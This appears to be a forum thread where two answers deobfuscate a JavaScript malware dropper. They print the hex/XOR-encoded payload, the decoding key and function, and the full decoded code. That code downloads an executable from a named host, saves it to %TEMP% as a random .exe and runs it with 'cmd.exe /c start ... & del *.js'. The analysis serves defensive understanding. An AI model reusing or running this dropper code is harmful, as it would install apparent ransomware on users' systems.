What Does The Following Code Snippet Do? (javascript)
Solution 1:
Here is what it does: the code XOR-decodes the long hex string variable (`var lzpxyboxat="f0f70ca69f5683161c510c..."`). The decoded string is itself JavaScript, which the outer script then hands to eval — a classic two-stage dropper, where the hex/XOR layer exists only to hide the real logic from string-based scanners. This is the decoded code:
// Synchronously fetches `url` through the MSXML2.XMLHTTP COM object (ActiveX, i.e.
// Windows Script Host / Internet Explorer only). The `open(..., false)` makes the
// request blocking, so the script stalls until the download completes or fails.
// Calls callback(body, false) with the raw response bytes on HTTP 200, and
// callback(null, true) on any other status or on any exception (no ActiveX, no network).
function getDataFromUrl(url, callback) {
    try {
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            // ResponseBody is the undecoded byte stream, passed on to be written to disk as-is.
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Downloads the second-stage payload, retrying the same hard-coded URL up to three
// times (the retries are unrolled as nested callbacks) before reporting failure.
// The "f=2.gif" query parameter is a disguise: the bytes that come back are written
// to disk as an .exe by saveToTemp, never treated as an image.
// Calls callback(bytes, false) on the first success, callback(null, true) after
// three consecutive failures or any exception.
function getData(callback) {
    try {
        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
            if (!error) {
                return callback(result, false);
            } else {
                // Retry 1 of 2.
                getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                    if (!error) {
                        return callback(result, false);
                    } else {
                        // Retry 2 of 2.
                        getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                return callback(null, true);
                            }
                        });
                    }
                });
            }
        });
    } catch (error) {
        return callback(null, true);
    }
}
// Builds a random drop path inside the user's temporary folder.
// GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant (%TEMP%);
// the file name is Math.random() rendered in base 36, truncated to at most 9
// characters, with an ".exe" extension — so each infection drops a differently
// named file, which defeats naive filename-based indicators.
// Returns the full path string, or false if the FileSystemObject could not be
// created. (`returnfalse;` is an extraction artefact of `return false;`.)
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        returnfalse;
    }
}
// Writes `data` (the raw download bytes) to a freshly generated path in %TEMP%
// using an ADODB.Stream: Type = 1 is adTypeBinary, and SaveToFile(path, 2) is
// adSaveCreateOverWrite, so an existing file at that path is silently replaced.
// Calls callback(path, false) on success, callback(null, true) if no path could
// be built or any COM call threw.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Entry point of the decoded stage: download -> drop into %TEMP% -> execute.
// "cmd.exe /c start <path>" launches the dropped .exe detached from this script;
// the chained "& del *.js" then deletes every .js file in the shell's current
// directory — presumably the dropper script itself, to remove the evidence.
// All errors are swallowed, so a failed run leaves no trace in the script output.
getData(function (data, error) {
    if (!error) {
        saveToTemp(data, function (path, error) {
            if (!error) {
                try {
                    var wsh = new ActiveXObject("WScript.Shell");
                    wsh.Run("cmd.exe /c start " + path + " & del *.js");
                } catch (error) {
                }
            }
        });
    }
});
This code downloads a file from the URL (WARNING: live malware download — only fetch it inside an isolated analysis VM) http://bobdomjda.top/admin.php?f=2.gif . Despite the `.gif` in the query string, the response is written as raw bytes to a randomly named `<temp>\xxxxxxxxx.exe` in the user's temporary folder (`GetSpecialFolder(2)`) and launched with `cmd.exe /c start [filename]`; the same command line then runs `del *.js` in the current directory, presumably to delete the dropper script itself. The download is retried up to three times against the same URL before the script gives up.
As far as I can see the download and execution only work on Windows: every step depends on ActiveX/COM objects (MSXML2.XMLHTTP, Scripting.FileSystemObject, ADODB.Stream, WScript.Shell) that are available under Windows Script Host — which is what runs a `.js` file when it is double-clicked, e.g. from an e-mail attachment. The `del *.js` cleanup strongly suggests that delivery path.
I uploaded the downloaded file to VirusTotal: analysis result. Bear in mind that a VirusTotal verdict is a point-in-time snapshot, and the payload served by that URL can be swapped at any moment, so a later fetch may return a different sample or nothing at all.
Solution 2:
Deobfuscating your script yields:
// Hex-encoded second-stage payload: every two hex digits are one byte of the original
// JavaScript XORed with the repeating 12-byte key used by decrypt() below.
// (The sample's original variable name was lzpxyboxat; renamed here for readability.)
var encrypted =
"f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
"c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
"7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
"f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
"99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
"4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
"bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
"874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
"414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
"f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
"9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
"5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
"c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
"8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
"4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
"f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
"881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
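// Repeating-key XOR decoder for the obfuscated payload (an analysis helper, safe to run
// on its own — it only produces a string).
// `encrypted`: hex string, two hex digits per byte; whitespace between pairs is ignored.
// `key`: optional array of byte values; defaults to the 12-byte key embedded in the sample,
//        so existing callers that pass one argument keep working. Passing a key lets the
//        same decoder be reused on variants of this dropper that rotate the key.
// Byte i is XORed with key[i % key.length] and appended as a char code.
// Returns the decoded text; "" for an empty, null or non-hex input instead of throwing.
// This is obfuscation, not encryption: the key sits next to the ciphertext, so the payload
// can be recovered statically. Never eval() the result to "see what it does".
// Fixes vs. the posted version: the body read `encoded` instead of the parameter
// `encrypted` (a ReferenceError), `functiondecrypt` / `newArray` lacked spaces, and an
// input with no hex pairs (`match` returns null) crashed on `.length`.
function decrypt(encrypted, key) {
    var xorKey = key || [150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159];
    var bytes = encrypted ? String(encrypted).match(/\S{2}/g) || [] : [];
    var code = "";
    for (var i = 0; i < bytes.length; i++) {
        code += String.fromCharCode(parseInt(bytes[i], 16) ^ xorKey[i % xorKey.length]);
    }
    return code;
}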
// eval(decrypt(encrypted)); // commented out to prevent accidental execution
The script contains a hex-encoded second-stage JavaScript payload and a `decrypt` function that applies a repeating 12-byte XOR key (150, 130, 98, …). This is obfuscation rather than encryption: the key is embedded right next to the ciphertext, so the payload can be recovered offline without ever running the script — which is the safe way to analyse it. (Note the posted `decrypt` body references `encoded` while the parameter is named `encrypted`; use the parameter name when reproducing it.)
Decoding the payload yields:
// Synchronously fetches `url` through the MSXML2.XMLHTTP COM object (ActiveX, i.e.
// Windows Script Host / Internet Explorer only); `open(..., false)` makes the call
// blocking, so the script stalls until the download completes or fails.
// Calls callback(body, false) with the raw response bytes on HTTP 200, and
// callback(null, true) on any other status or on any exception.
function getDataFromUrl(url, callback) {
    try{
        var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlHttp.open("GET", url, false);
        xmlHttp.send();
        if (xmlHttp.status == 200) {
            // ResponseBody is the undecoded byte stream, later written to disk unchanged.
            return callback(xmlHttp.ResponseBody, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Downloads the second-stage payload, retrying the same hard-coded URL up to three
// times (unrolled as nested callbacks) before reporting failure. The "f=2.gif"
// query parameter is a disguise — the response is dropped to disk as an .exe.
// Calls callback(bytes, false) on the first success, callback(null, true) after
// three consecutive failures or any exception.
function getData(callback) {
    try {
        getDataFromUrl(
            "http://bobdomjda.top/admin.php?f=2.gif",
            function(result, error) {
                if (!error) {
                    return callback(result, false);
                } else {
                    // Retry 1 of 2.
                    getDataFromUrl(
                        "http://bobdomjda.top/admin.php?f=2.gif",
                        function(result, error) {
                            if (!error) {
                                return callback(result, false);
                            } else {
                                // Retry 2 of 2.
                                getDataFromUrl(
                                    "http://bobdomjda.top/admin.php?f=2.gif",
                                    function(result, error) {
                                        if (!error) {
                                            return callback(result, false);
                                        } else {
                                            return callback(null, true);
                                        }
                                    }
                                );
                            }
                        }
                    );
                }
            }
        );
    } catch (error) {
        return callback(null, true);
    }
}
// Builds a random drop path inside the user's temporary folder.
// GetSpecialFolder(2) is the FileSystemObject TemporaryFolder constant (%TEMP%);
// the name is Math.random() in base 36, truncated to at most 9 characters, plus
// ".exe" — each run drops a differently named file (e.g. "owynovqn2.exe").
// Returns the path string, or false if the FileSystemObject could not be created.
// (`returnfalse;` is an extraction artefact of `return false;`.)
function getTempFilePath() {
    try {
        var fs = new ActiveXObject("Scripting.FileSystemObject");
        var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
        var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
        return tmpFilePath;
    } catch (error) {
        returnfalse;
    }
}
// Writes `data` (the raw download bytes) to a freshly generated path in %TEMP%
// via an ADODB.Stream: Type = 1 is adTypeBinary, SaveToFile(path, 2) is
// adSaveCreateOverWrite (an existing file at that path is silently replaced).
// Calls callback(path, false) on success, callback(null, true) if no path could
// be built or any COM call threw.
function saveToTemp(data, callback) {
    try {
        var path = getTempFilePath();
        if (path) {
            var objStream = new ActiveXObject("ADODB.Stream");
            objStream.Open();
            objStream.Type = 1;
            objStream.Write(data);
            objStream.Position = 0;
            objStream.SaveToFile(path, 2);
            objStream.Close();
            return callback(path, false);
        } else {
            return callback(null, true);
        }
    } catch (error) {
        return callback(null, true);
    }
}
// Entry point of the decoded stage: download -> drop into %TEMP% -> execute.
// In the live sample the Run() line below is active: "cmd.exe /c start <path>"
// launches the dropped .exe detached from the script, and "& del *.js" then
// deletes every .js file in the shell's current directory — presumably the
// dropper itself, to remove the evidence. It is commented out here so that
// pasting this listing into a Windows host cannot accidentally run the payload.
// All errors are swallowed.
getData(
    function (data, error) {
        if (!error) {
            saveToTemp(
                data,
                function (path, error) {
                    if (!error) {
                        try {
                            var wsh = new ActiveXObject("WScript.Shell");
                            // wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
                        } catch (error) {}
                    }
                }
            );
        }
    }
);
This script
- Downloads an executable file from
http://bobdomjda.top/admin.php?f=2.gif (the `.gif` name is a disguise; the bytes are treated as a PE executable), retrying up to three times.
- Uses ActiveX ("Scripting.FileSystemObject", "ADODB.Stream") to save it in your %TEMP% folder under a random name, e.g. "owynovqn2.exe".
- Uses ActiveX ("WScript.Shell") to execute it with `cmd.exe /c start <path>`, and in the same command line runs `del *.js` in the current directory — most likely to delete the dropper script itself after it has done its job.
According to virustotal.com, 8 of 61 virus scanners recognized the executable file as malicious at the time of analysis, e.g. McAfee classified it as "BehavesLike.Win32.Ransom.dc". A low detection ratio on a freshly served payload is typical and says nothing about how harmful it is; treat the dropped file as ransomware until proven otherwise and never open it outside an isolated VM.